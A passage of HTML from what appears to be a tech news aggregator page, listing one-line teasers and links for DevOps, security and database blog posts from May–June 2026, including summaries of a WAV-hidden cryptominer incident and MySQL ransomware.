              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Trento 3.1 continues the road started with Trento 3.0 around automation and AI capabilities. It also strengthens the application core and brings important observability improvements. Timezone Awarenes</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/announcing-trento-version-3-1/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-feature-flag-tools-compared-10-platforms-for-safer-releases" class="group relative scroll-mt-24">
        <a href="#h3-feature-flag-tools-compared-10-platforms-for-safer-releases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Feature Flag Tools Compared: 10 Platforms for Safer Releases
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-feature-flag-tools-compared-10-platforms-for-safer-releases"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Compare 10 feature flag tools across rollout controls, experimentation, governance, self-hosting, and observability. Find the best platform for startups, enterprises, and data-driven teams. | Blog</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/feature-flag-tools-compared-10-best-platforms-for-safer-releases"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-we-cut-build-times-by-two-thirds-by-deleting-our-cms" class="group relative scroll-mt-24">
        <a href="#h3-how-we-cut-build-times-by-two-thirds-by-deleting-our-cms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How we cut build times by two-thirds by deleting our CMS
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-we-cut-build-times-by-two-thirds-by-deleting-our-cms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Sentry replaced its CMS with Astro, Markdown, and Claude Code skills — cutting build times from 14 to under 4 minutes and eliminating API failures.</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/cut-build-times-delete-cms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-you-dont-need-to-pick-one-how-sentry-and-opentelemetry-work-together" class="group relative scroll-mt-24">
        <a href="#h3-you-dont-need-to-pick-one-how-sentry-and-opentelemetry-work-together" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 You don’t need to pick one: how Sentry and OpenTelemetry work together
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-you-dont-need-to-pick-one-how-sentry-and-opentelemetry-work-together"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Use Sentry on the frontend, keep OpenTelemetry on the backend, and choose direct OTLP or Collector forwarding for OTLP events.</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/sentry-opentelemetry-work-together/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-your-agent-cant-fix-what-it-cant-see" class="group relative scroll-mt-24">
        <a href="#h3-your-agent-cant-fix-what-it-cant-see" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Your agent can't fix what it can't see
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-your-agent-cant-fix-what-it-cant-see"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Agents can&#39;t fix bugs they can&#39;t see. Learn how Sentry MCP and CLI give coding agents the production context to diagnose and fix issues automatically.</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/agents-need-production-context/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-can-a-high-performance-culture-also-prioritize-wellbeing" class="group relative scroll-mt-24">
        <a href="#h3-can-a-high-performance-culture-also-prioritize-wellbeing" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Can a High-Performance Culture Also Prioritize Wellbeing?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-can-a-high-performance-culture-also-prioritize-wellbeing"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Discover how New Relic balances a high-performance culture with mental health and wellbeing through community, compassion, and continuous support.</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/can-a-high-performance-culture-also-prioritize-wellbeing"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-security"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-claude-code-security-catches-vulnerabilities-while-you-write-code" class="group relative scroll-mt-24">
        <a href="#h3-claude-code-security-catches-vulnerabilities-while-you-write-code" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Claude Code Security Catches Vulnerabilities While You Write Code
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-claude-code-security-catches-vulnerabilities-while-you-write-code"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Claude Code Security uses AI reasoning to catch complex vulnerabilities in code — including logic flaws that traditional static analysis tools consistently miss.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/claude-code-security-catches-vulnerabilities-while-you-write-code/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-aws-shield-advanced-introduces-ddos-attack-flow-logs" class="group relative scroll-mt-24">
        <a href="#h3-aws-shield-advanced-introduces-ddos-attack-flow-logs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AWS Shield Advanced introduces DDoS attack flow logs
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-aws-shield-advanced-introduces-ddos-attack-flow-logs"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AWS Shield Advanced announces distributed denial-of-service (DDoS) attack flow logs, giving you packet-level visibility into traffic hitting Shield Advanced protected resources during a DDoS attack. T</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/aws-shield-ddos/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-petabytes-to-predictions-easy-bigquery-insights-in-google-sheets" class="group relative scroll-mt-24">
        <a href="#h3-from-petabytes-to-predictions-easy-bigquery-insights-in-google-sheets" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From petabytes to predictions: Easy BigQuery insights in Google Sheets
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-petabytes-to-predictions-easy-bigquery-insights-in-google-sheets"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Many organizations’ single source of truth is data that resides in BigQuery, Google’s governed, secure and petabyte-scale data platform. However, the &quot;last mile&quot; of ad-hoc analysis, modeling, and repo</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/data-analytics/using-connected-sheets-to-analyze-bigquery-data/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-relay-network-adopted-ai-coding-securely-and-built-the-foundation-for-agentic-development" class="group relative scroll-mt-24">
        <a href="#h3-how-relay-network-adopted-ai-coding-securely-and-built-the-foundation-for-agentic-development" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How Relay Network Adopted AI Coding Securely and Built the Foundation for Agentic Development
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-relay-network-adopted-ai-coding-securely-and-built-the-foundation-for-agentic-development"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>See how Relay Network securely adopted AI coding with Snyk and GitHub Copilot, implementing &quot;secure at inception&quot; to reduce vulnerabilities and accelerate development.</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/relay-network-ai-coding-securely-coagentic-development/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fix-sca-issues-at-scale-in-your-terminal-with-snyk-remediation-agent-in-the-cli" class="group relative scroll-mt-24">
        <a href="#h3-fix-sca-issues-at-scale-in-your-terminal-with-snyk-remediation-agent-in-the-cli" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Fix SCA issues at scale in your terminal with Snyk Remediation Agent in the CLI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-fix-sca-issues-at-scale-in-your-terminal-with-snyk-remediation-agent-in-the-cli"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Stop security backlogs. Snyk&#39;s Remediation Agent in the CLI pairs AI reasoning with Snyk security intelligence to fix SCA issues at scale directly in your terminal.</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/snyk-remediation-agent-in-the-cli/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-10-essential-reads-to-optimize-performance-security-and-roi-in-the-ai-era" class="group relative scroll-mt-24">
        <a href="#h3-10-essential-reads-to-optimize-performance-security-and-roi-in-the-ai-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 10 essential reads to optimize performance, security, and ROI in the AI era
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-10-essential-reads-to-optimize-performance-security-and-roi-in-the-ai-era"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As enterprise IT organizations push deeper into operationalizing AI, the conversation has shifted from theoretical capability to hard execution metrics. Whether your team is talking with customers abo</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/10-essential-reads-optimize-performance-security-and-roi-ai-era"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-anthropics-mythos-glasswing-and-ais-next-phase" class="group relative scroll-mt-24">
        <a href="#h3-anthropics-mythos-glasswing-and-ais-next-phase" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Anthropic’s Mythos, Glasswing, and AI’s Next Phase
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-anthropics-mythos-glasswing-and-ais-next-phase"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This is not a security problem. As we’ve settled into the speed of AI, it’s become clear that security isn’t a job solely for the security team. Here’s why. | Blog</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/anthropics-mythos-glasswing-and-how-the-industry-must-move-forward"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-is-digital-sovereignty-illusory-without-open-source-and-a-trusted-supply-chain" class="group relative scroll-mt-24">
        <a href="#h3-is-digital-sovereignty-illusory-without-open-source-and-a-trusted-supply-chain" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Is digital sovereignty illusory without open source and a trusted supply chain?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-is-digital-sovereignty-illusory-without-open-source-and-a-trusted-supply-chain"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>For a Chief Information Officer (CIO) or VP of Infrastructure, the term &quot;digital sovereignty&quot; often arrives as a regulatory burden to support a collection of acronyms like DORA (the EU Digital Operati</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/digital-sovereignty-illusory-without-open-source-and-trusted-supply-chain"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-7-features-of-red-hat-identity-management-you-need-to-know-for-the-modern-enterprise" class="group relative scroll-mt-24">
        <a href="#h3-7-features-of-red-hat-identity-management-you-need-to-know-for-the-modern-enterprise" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 7 features of Red Hat Identity Management you need to know for the modern enterprise
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-7-features-of-red-hat-identity-management-you-need-to-know-for-the-modern-enterprise"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In the era of hyper-distributed systems where AI agents traverse our networks, and hybrid clouds stretch from the edge to the core, the &quot;who&quot; and &quot;what&quot; of infrastructure access are more critical than</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/7-features-red-hat-identity-management-you-need-know-modern-enterprise"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-continuous-offensive-security-the-line-weve-been-walking" class="group relative scroll-mt-24">
        <a href="#h3-continuous-offensive-security-the-line-weve-been-walking" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Continuous Offensive Security: The Line We've Been Walking
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-continuous-offensive-security-the-line-weve-been-walking"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Snyk&#39;s Continuous Offensive Security unifies DAST, AI pentesting, and agent red teaming to find exploitable flaws — not just bugs — before attackers do. Here&#39;s why lineage matters.</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/continuous-offensive-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-blog-introducing-falco-0440" class="group relative scroll-mt-24">
        <a href="#h3-blog-introducing-falco-0440" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Blog: Introducing Falco 0.44.0
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-blog-introducing-falco-0440"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Dear Falco Community, we are happy to announce the release of Falco 0.44.0 today! This release completes the deprecation cycle started in 0.42.0 and 0.43.0: the legacy eBPF probe, the gVisor engine, a</p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Falco Blog</strong></p>
<p><a href="https://falco.org/blog/falco-0-44-0/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-databases"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-please_read_me-the-opportunistic-ransomware-devastating-mysql-servers" class="group relative scroll-mt-24">
        <a href="#h3-please_read_me-the-opportunistic-ransomware-devastating-mysql-servers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PLEASE_READ_ME: The Opportunistic Ransomware Devastating MySQL Servers
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-please_read_me-the-opportunistic-ransomware-devastating-mysql-servers"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Guardicore Labs uncovers a Ransomware detection campaign targeting MySQL servers. Attackers use Double Extortion and publish data to pressure victims.</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/please-read-me-opportunistic-ransomware-devastating-mysql-servers"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-in-two-may-2026-edition" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-in-two-may-2026-edition" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new in two: May 2026 edition
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-whats-new-in-two-may-2026-edition"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
